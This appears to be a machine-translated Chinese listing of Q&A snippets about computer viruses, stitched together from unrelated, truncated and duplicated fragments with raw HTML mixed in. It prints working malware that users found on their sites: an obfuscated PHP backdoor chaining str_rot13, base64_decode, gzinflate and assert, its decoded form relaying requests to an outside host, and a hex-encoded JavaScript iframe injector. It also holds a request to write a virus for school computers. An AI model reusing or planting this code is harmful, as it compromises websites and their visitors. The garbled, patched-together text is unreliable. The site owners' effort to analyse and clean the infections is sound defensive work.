计算机病毒是一种计算机程序,可以自我复制并从一台计算机传播到另一台计算机。术语“病毒”也通常但错误地用于指代其他类型的恶意软件,包括但不限于不具有生殖能力的广告软件和间谍软件程序。
如何创建我自己的.exe 或.lib 文件病毒签名?我开始将某些字节读取到文件中,然后将它们存储在另一个文件中并手动将其添加到病毒扫描程序中......
为什么我的代码编辑器要求我输入 kdewallet 的密码?
我在新的 linux 安装和 apon 打开时安装了最新版本的 vscode,我收到一个弹出窗口,询问我的 kde 钱包的密码 我没有输入密码,因为我...
Ionic 应用程序在 Android 设备中显示出恶意。风险名称:Android:Evo-gen[Trj]+AG1335518|egap
我们的应用程序处于测试版版本。从 Play 商店下载后,在某些 Android 设备中,速度会变慢,该应用程序是恶意的。请参考图片。在某些设备中它显示警告...
我收到一封电子邮件,其中包含 Visual Basic (.vbs) 脚本。在安全环境下打开,发现了这个。它有什么作用? 昏暗的字符串名称,字符串长度 strname = "这个函数是为了...
我在 pygame 中制作了一个名为 Balls to the Walls 的游戏,在 pyinstaller 中构建程序时遇到错误。我跑: C:\Users\Ben pyinstaller --windowed --icon=logo.ico BallsWalls.py 欧...
我需要为学校计算机制作一个病毒。每个有他们的网站都被屏蔽了。任何都可以。谢谢。 所有恶意软件均被阻止。为我做一些新的东西(最好使用 java 或 python)。我需要...
因此,在查看朋友发给我的一些服务器文件(FiveM/GTA RP 服务器文件)时,我发现一行代码遍布服务器的资源,是恶意的吗?因为我检查了“...
我有一些客户网站感染了促销广告恶意软件,这些恶意软件会向访问者显示不需要的广告,例如在这个网站 https://tk63.tennis/ 上有这个广告促销
我想知道是否有人能弄清楚这个 php 中的代码是做什么的 我现在已经删除了它,但我很好奇它是如何到达那里以及它有什么作用 我在我的 WordPress 网站之一中找到了这个 我想知道是否有人能弄清楚这个 php 中的代码是做什么的 我现在已经删除了它,但我很好奇它是如何到达那里以及它有什么作用 我在我的 WordPress 网站之一中发现了这个 <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(emyiac-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/emyiacimwqkfv-.php?p=$2 [L] </IfModule> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(auyaix-|showthrd-)(.*)$ /var/www/html/dglcreative/wp-content/auyaixfblclcc-.php?p=$2 [L] </IfModule> 其中一个文件包含以下内容: <?php $TWRgwh3="6jsmOpAjZ5Bi5Ll2wfssHqB3cBfkZgGlMnzBalluE/Hi5mPZ9XQ6wo21mQNXZanQAAvE8X/GnjBNvD0dEbPCDPD1hoOiSjwuWReEae1cV3DnIhxxXbDWak5n7uteSIOeKlQ7HHX+fRlp/ESRTLFEgPHdF2y698RzSYrsp0rU8Aas3bH+gb6j+1D03qNaS/PUqReuTrZtETiQCi4LUHo4gRxzKp/6TXUk+aN3FzWOBI6Ini3YXbgcKPoop3wVviiKz9C3JuSg/eFgGqslnyo+eCmEk1Vl+NiIBBO8z9N+DA/VrM4z0DeobnbIbPlTrxqUPmOX1/SsphPhOgTvqi2mdbJQqEinevjitWI+BNPngJpO21mfOzu982FXRD/7vdcp1pnBoipzKLf7XEXOx0i3tcFVVB8/+5k5o4f8eYDPQawmvLN7fNr3SS126GLAkPVi9e6ovA6DRe78E5xzixe9iguUgvAyg1kk9vGHcICXoJ9tI8QaiP67W4j/L1scsNGGwZxRc41fLW0I1xFNZSlgOIpaMeIq2vrRvG6fXE8uUpSooTesUAmkzKfcJY8ixOAEI5JSS4QPfjgDqsvY5wVXx80CQvUBj1TFzCFhHeOTCKOVOh7QYwkyosnH7OW4ql0yXEiAr2KizXx8A909Pd/kJb3RnMk9qsOf5NU0Si4DDIjB1D5IvU/0LmKioSMQo8ZDMrgHUJKxXqSjRgG4DN+sk1zucAxNJ2yQkXCb+4wWLJelYkLyDun19PmA7gtUxTZWvF/DUje1a4FNqnI31zYLIc4d34AvTwQfRuaBZyDKbCrWmAbJ5N6qTYpwofIyWM3odv+IFbmmb58UaDU44CJQJzrE9Sg4ScIllAUlD8rODiGSbLdf/zf4nM91LH6x0AKJZ1xp+Ekm5p1ZHMjeNfzPwMm+oorgi1Pwpm2XIdYV2WgN+2K+FFYCvUA5IRgqspaerwIC/qrrJkP6RAGo3wzuxWZY3CB9qin/iw2CqrVDSDuPHW69sI16EVY5zzyDL7Mf4WNKcPlUyaj2f6i9WaQShXxvjyQL9LJ9b99k58jXIVDqDhID16dlZq6loIKq10/3nXSN7OIQLtWY0liMcLR0HZ6vGdKELM9VJGxLoedP9o0Y4Z+Q2kjqos8Qm8Di3X4LhO2SmOAuFZ6ENqGSQ4JJRe8SGn/8JTNDQ7MfaD+DlwiuCOSQYg==";$kYIKQj="\141";$syMk1BFi="\x62\x61\x73";$ZTMvjgX="\163\164";$yW51kL="Fl1YmASDIjxWQ0bimmP2IFzh9Z02qUYY1VNWnIdeBTMHhb";$cBqLFy="\x67\x7a\151";$cBqLFy.="\156\x66";$kYIKQj.="\163";$yW51kL.="GnXvyMd1FTzkcz+9tdyrqTyacaX1za5EqcdXEJOefUMKao";$syMk1BFi.="\x65\66\x34";$ZTMvjgX.="\162\137\x72";$ZTMvjgX.="\157\x74";$cBqLFy.="\x6c\x61";$syMk1BFi.="\x5f\x64\x65\143";$yW51kL.="TywQzQnJObMjwen2WfDRCqixwPXA/XVHhAaEZQJkzaStpL";$kYIKQj.="\163\145";$cBqLFy.="\x74\x65";$syMk1BFi.="\x6f\x64\145";$yW51kL.="w5pTSIf1uAGJhUIWNoIMXqPa3pXwHtMtTS1GJgND==";$kYIKQj.="\162\x74";$ZTMvjgX.="\x31\x33";@$kYIKQj($cBqLFy($syMk1BFi($ZTMvjgX($yW51kL))));?> 因为问题是“这段代码是什么意思?”该代码归结为以下内容。 如果我是您,我会开始查找访问日志文件以查找 url 中包含 ?p= 的条目。 <?php header('Content-Type: text/html; charset=UTF-8'); $p = 'p'; $host='websys-nt.com'; $path='/wb0454545/'; $srvr=$_SERVER['HTTP_HOST'].'/'; function GetRealIp() { if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip=$_SERVER['HTTP_CLIENT_IP'];} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];} else { $ip=$_SERVER['REMOTE_ADDR'];} return $ip; } if(isset($_GET[$p])) { $r = GetRealIp(); if (strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")!==FALSE) $r = substr($_SERVER["HTTP_USER_AGENT"], strpos($_SERVER["HTTP_USER_AGENT"], "IP: ")+4); $param=$_GET[$p]; if (strpos($param, '.js') !== false) { $ext='.js'; $param = str_replace('.js','',$param); $srvr=''; } else if(strpos($param, 'prokl-') !== false) { $ext='.php?tds-q='.urlencode(substr($param, strpos($param, "prokl-")+6)); $param='prokl'; $srvr=''; } else if(strpos($param, '.css') !== false) { $ext='.css'; $param = str_replace('.css','',$param); $srvr=''; } else if(strpos($param, '.gif') !== false) { $ext='.gif'; $param = str_replace('.gif','',$param); $srvr=''; } else if(strpos($param, '.htm') !== false) { $ext='.htm'; $param = str_replace('.htm','',$param); $srvr=''; } else if(strpos($param, '.jpg') !== false) { $ext='.jpg'; $param = str_replace('.jpg','',$param); $srvr=''; } else if(strpos($param, '.ico') !== false) { $ext='.ico'; $param = str_replace('.ico','',$param); $srvr=''; } else if(strpos($param, '.png') !== false) { $ext='.png'; $param = str_replace('.png','',$param); $srvr=''; } else{ $rf=$_SERVER['HTTP_REFERER']; $ext='.php?ip='.$r.'&ref='.$ref; } $out =''; $buff = ''; if ($curl = curl_init()) { curl_setopt($curl, CURLOPT_URL, 'http://'.$host.$path.$srvr.$param.$ext); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); $out = curl_exec($curl); curl_close($curl); }else{ $fp = fsockopen($host, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$path.$srvr.$param.$ext." HTTP/1.1\r\n"; $out .= "Host: ".$host."\r\n"; $out .= "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (!feof($fp)) { $buff.=fgets($fp, 128); } $result = explode("\r\n\r\n", $buff, 2); $out= $result[1]; fclose($fp); } } echo $out; exit ; } ?> 我不知道为什么有些人对正确的问题投反对票。浏览了整个互联网,刚刚找到了您的帖子。在我的一个受感染站点上也发生了同样的事情。我一直在调查为什么我的服务器偶尔会过载,并指出了您刚才问的问题。看起来脚本创建了许多请求并使站点饱和。 66.249.73.1 - - [17/Dec/2023:04:51:37 -0500] "GET /shadow.php?r/I3196884.html HTTP/1.1" 404 1711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.73.1 - - [17/Dec/2023:04:52:25 -0500] "GET /shadow.php?d/T1084079.html HTTP/1.1" 404 1711 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 我相信是病毒攻击,htaccess文件被更改为这样 <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / DirectoryIndex index.php RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> 它看起来像一个谷歌机器人,但我相信这是一个机器人爬行病毒篡夺了谷歌机器人。在这里查看 https://support.google.com/webmasters/thread/160538224/google-bot-crawling-links-recieved-from-malicious-sources?hl=en 我仍在努力,使用备份来扭转损坏并逐一检查更改的文件,这很容易,因为所有更改的文件都来自同一日期,然后替换为以前存储的版本。 (仍在修复它,稍后更新以查看更好的修复)将站点置于保留状态且不可变(任何人都无法在公共文件上使用此命令来更改) chattr -R +i public_html 一旦弄清楚就逆转 chattr -R -i public_html
所以我的一个朋友需要一些我在卷轴时间编码的视频,所以我创建了一个脚本来询问你的名字以及你是否喜欢糖果。这是“危险”的脚本 #包括 所以我的一个朋友需要一些我在卷轴时间内编码的视频,所以我创建了一个脚本来询问你的名字以及你是否喜欢糖果。这是“危险”的脚本 #include <iostream> int main() { //UIVAR std::string userName; std::string userLikeCandy; //START std::cout << "Hello World!\n"; std::cout << "What is your name?\n"; std::cin >> userName; std::cout << "Nice to meet you " << userName << "\nDo you like candy? y/n\n"; std::cin >> userLikeCandy; if (userLikeCandy == "y") { std::cout << "Hi " << userName << " I see you do like candy\n"; } else if (userLikeCandy == "n") { std::cout << "Hi " << userName << " I see you don't like candy\n"; } else { std::cout << "Err, did you use y/n?"; } } 所以当他去下载它(通过谷歌驱动器文件夹发送)时,它被标记为病毒,所以我们总共运行了一个病毒,它有 6 个标记。其中一个是木马😂 https://www.virustotal.com/gui/file/430829b8f4b4c33372f1632080fdd90fcd31c6cfc296872ae9ff0d97fd86a3ba/检测 有人知道为什么吗? 您的文件扩展名是什么?尝试将文件扩展名更改为“txt”或其他名称。
我有一个构建变体,我们仅在内部使用它进行测试,并通过谷歌驱动器或电子邮件与团队内部共享。然而,从过去一个月开始,谷歌正在标记...
我正在开发一个应用程序,它充当 Http 代理,用于从外部资源提供文件。它实际上从外部资源下载文件,检查病毒以及文件是否...
Clamav 从 C-ICAP 代理接收修改后的文件进行扫描
我已将 EICAR 测试文件植入到应用程序中,该文件位于 C-ICAP SquidClamav 代理后面。代理将特定流量重定向到 ClamAV 进行病毒扫描。问题是该文件...
我的所有网站上都有一些 JS“病毒”问题。它们位于不同的主机上,其中一些主机上出现此代码。 函数 c2670903e0i49d9f1a845f6b(i49d9f1a846377...</desc> <question vote="4"> <p>我的所有网站上都存在一些 JS“病毒”问题。它们位于不同的主机上,其中一些主机上出现此代码。</p> <pre><code><script> function c2670903e0i49d9f1a845f6b(i49d9f1a846377) { var i49d9f1a846737 = 16; return (parseInt(i49d9f1a846377, i49d9f1a846737)); } function i49d9f1a8472f3(i49d9f1a8476d9) { var i49d9f1a848679 = 2; var i49d9f1a847da9 = ''; i49d9f1a848e47 = String.fromCharCode; for (i49d9f1a84828e = 0; i49d9f1a84828e < i49d9f1a8476d9.length; i49d9f1a84828e += i49d9f1a848679) { i49d9f1a847da9 += (i49d9f1a848e47(c2670903e0i49d9f1a845f6b(i49d9f1a8476d9.substr(i49d9f1a84828e, i49d9f1a848679)))); } return i49d9f1a847da9; } var r1a = ''; var i49d9f1a84922e = '3C7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a +'43E696628216D7' + r1a + '96961297' + r1a + 'B646F637' + r1a + '56D656E7' + r1a + '42E7' + r1a + '7' + r1a + '7' + r1a + '2697' + r1a + '465287' + r1a + '56E657' + r1a + '363617' + r1a + '065282027' + r1a + '2533632536392536362537' + r1a + '322536312536642536352532302536652536312536642536352533642536332533322533362532302537' + r1a + '332537' + r1a + '32253633253364253237' + r1a + '2536382537' + r1a + '342537' + r1a + '342537' + r1a + '302533612532662532662536352536332536662536642532652537' + r1a + '322536312537' + r1a + '322536352536322537' + r1a + '322536352536352536342536362536662536662537' + r1a + '342537' + r1a + '37' + r1a + '2536352536312537' + r1a + '32253265253633253666253664253266253366253237' + r1a + '2532622534642536312537' + r1a + '342536382532652537' + r1a + '322536662537' + r1a + '352536652536342532382534642536312537' + r1a + '342536382532652537' + r1a + '32253631253665253634253666253664253238253239253261253332253335253332253331253336253334253239253262253237' + r1a + '253632253237' + r1a + '2532302537' + r1a + '37' + r1a + '2536392536342537' + r1a + '34253638253364253335253332253331253230253638253635253639253637' + r1a + '2536382537' + r1a + '342533642533342533382533342532302537' + r1a + '332537' + r1a + '342537' + r1a + '39253663253635253364253237' + r1a + '2537' + r1a + '362536392537' + r1a + '332536392536322536392536632536392537' + r1a + '342537' + r1a + '39253361253638253639253634253634253635253665253237' + r1a + '2533652533632532662536392536362537' + r1a + '3225363125366425363525336527' + r1a + '29293B7' + r1a + 'D7' + r1a + '6617' + r1a + '2206D7' + r1a + '969613D7' + r1a + '47' + r1a + '27' + r1a + '5653B3C2F7' + r1a + '3637' + r1a + '2697' + r1a + '07' + r1a + '43E'; document.write(i49d9f1a8472f3(i49d9f1a84922e)); </script> </code></pre> <p><strong>NOD32</strong> 封锁该网站,因为他认为存在病毒。从源中删除代码并没有帮助,因为它会再次出现。它不可能是 XSS 的结果,因为它甚至出现在静态网站上。</p> <p>我尝试对我的系统进行全面扫描,但没有帮助。所有网站上唯一的东西是 Google Analytics,我认为这不会导致这种情况。</p> <p>编辑:您可以在 <a href="http://www.postuj.cz/test/" rel="nofollow noreferrer">http://www.postuj.cz/test/</a> 或 <a href="http://flavicius.php5.cz/" rel="nofollow noreferrer">http://flavicius.php5.cz/</a>.</p> 看到它 </question> <answer tick="true" vote="8"> <blockquote> <p>它们位于不同的主机上,其中一些主机上出现此代码。</p> </blockquote> <p>每个主机上的代码都相同吗?您能否给出受影响域之一的示例,以便我们可以检查代码是否存在于服务器端,而不仅仅是您的计算机上(这通常不太可能)。</p> <p>您发布的代码肯定非常可疑。解码后,它会将 iframe 写入 http://ecom.rarebreedfootwear.com/? (它尝试向 URL 添加高速缓存随机数,但由于拼写错误而失败)。</p> <p>该地址没有任何明显的漏洞利用 — 也许最终的目标漏洞尚未到位,或者这只是稍后真正攻击的测试运行,但您的网站上出现了意外的 JavaScript,它会自行解码并添加iframe 是一个巨大的危险信号。通常这意味着您的服务器已被入侵,需要使用新密码从头开始重新安装。</p> <p>预计到达时间:</p> <blockquote> <p>您可以在 hxxp://flavicius.php5.cz/ 看到它 </p> </blockquote> <p>谢谢。我删除了评论以隐藏工作 URL,因为它确实被感染了。目前还不清楚是在应用程序级别还是 Apache 本身,但每个页面的底部都有可疑脚本。</p> <p>因此,至少应用程序和可以想象的服务器受到了损害,应该离线进行清理、重新安装和诊断:您需要找出攻击者是如何进入的,这样就不会再次发生。首先,请检查您是否拥有最新版本的 WordPress,因为它过去曾遭受过许多安全漏洞。</p> </answer> <answer tick="false" vote="7"> <p>它看起来像 Vundo 或其变体。该恶意软件倾向于将看似无意义的 JavaScript 插入网站(在您端,而不是服务器端)。我建议尝试<a href="http://www.malwarebytes.org/mbam.php" rel="noreferrer">Malwarebytes 的反恶意软件</a>。安装、更新并进行全面扫描。如果失败,也许可以尝试研究专门删除 Vundo 的选项。</p> </answer> <answer tick="false" vote="0"> <p>这不是病毒。这是一个代码中的网站。(我的英语很糟糕:()</p> </answer> </body></html>
*win32ctypes.pywin32.pywintypes.在 VS Code 中使用 pyinstaller 时出错 - 可能是病毒/木马?
我正在使用 pyinstaller 为我的 python.py 文件生成可执行代码。但是,我收到此错误: 文件“C:\Users\xxxxx\AppData\Local\Programs\Python\Python311\Lib\site-packages\
PHP 警告:/wp-content/themes/HighendWP/functions/breadcrumbs.php 中的未定义数组键 0 第 208 行
我收到这个错误,无论我删除多少次,cPanel 上都会出现一个未知文件。我已经更改了所有密码(WordPress 和 cPanel),并且我已经尝试了一切可能...
我最近遇到一个 PHP 文件,我怀疑它可能包含不需要的病毒或恶意代码。不幸的是,我对 PHP 的了解有限,我不确定如何有效地分析它。我愿意
在聊天中发送我的网站链接:www.orgeu.com(重定向到 https://rgu.hu/)并尝试打开它后,我遇到了以下消息: 你将不能去这个林...
#include 无效主要(){ printf("h"); printf("h2"); } 我不知道为什么会这样,我正在使用 Bloodshed.inc 的 DevC++ 编译器 请前...
#include 无效主要(){ printf("h"); printf("h2"); } 我不知道为什么会这样,我正在使用 Bloodshed.inc 的 DevC++ 编译器 请前...